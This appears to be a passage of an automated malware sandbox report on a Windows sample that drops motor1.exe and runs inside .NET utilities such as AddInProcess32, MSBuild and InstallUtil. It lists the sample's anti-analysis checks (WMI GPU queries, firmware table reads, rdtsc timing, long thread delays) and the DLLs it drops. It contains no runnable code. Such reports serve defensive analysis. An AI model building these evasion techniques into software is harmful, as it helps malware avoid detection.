Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\SystemRootDoc\motor1.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Memory allocated: 22D60E10000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 2620000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 2790000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 4790000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 14F0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 30E0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: B80000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 28B0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: DA0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 1030000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 2DD0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 2BF0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 1380000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 2E80000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 4E80000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: F00000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 28B0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 48B0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 17F0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 3310000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 5310000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: DE0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2A00000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2900000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 1080000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2A30000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 1900000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 32B0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 52B0000 memory reserve | memory write watch
Source: C:\Users\user\SystemRootDoc\motor1.exe Memory allocated: 2144D270000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 1470000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 2D80000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 4D80000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2BC0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2D60000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 4D60000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 11D0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 2C10000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 29E0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 1180000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 2E30000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 13D0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 2DC0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 2F60000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 4F60000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 12B0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2C40000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 4C40000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 10B0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 1210000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Code function: 4_2_00007FFD93B71380 rdtsc 4_2_00007FFD93B71380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 465
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Window / User API: threadDelayed 5235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Window / User API: threadDelayed 4537
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\msvcp140_codecvt_ids.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\msvcp140_2.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-filesystem-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-environment-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-conio-l1-1-0.dll
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-time-l1-1-0.dll
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\vcomp140.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\msvcp140_1.dll
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-process-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-stdio-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-math-l1-1-0.dll
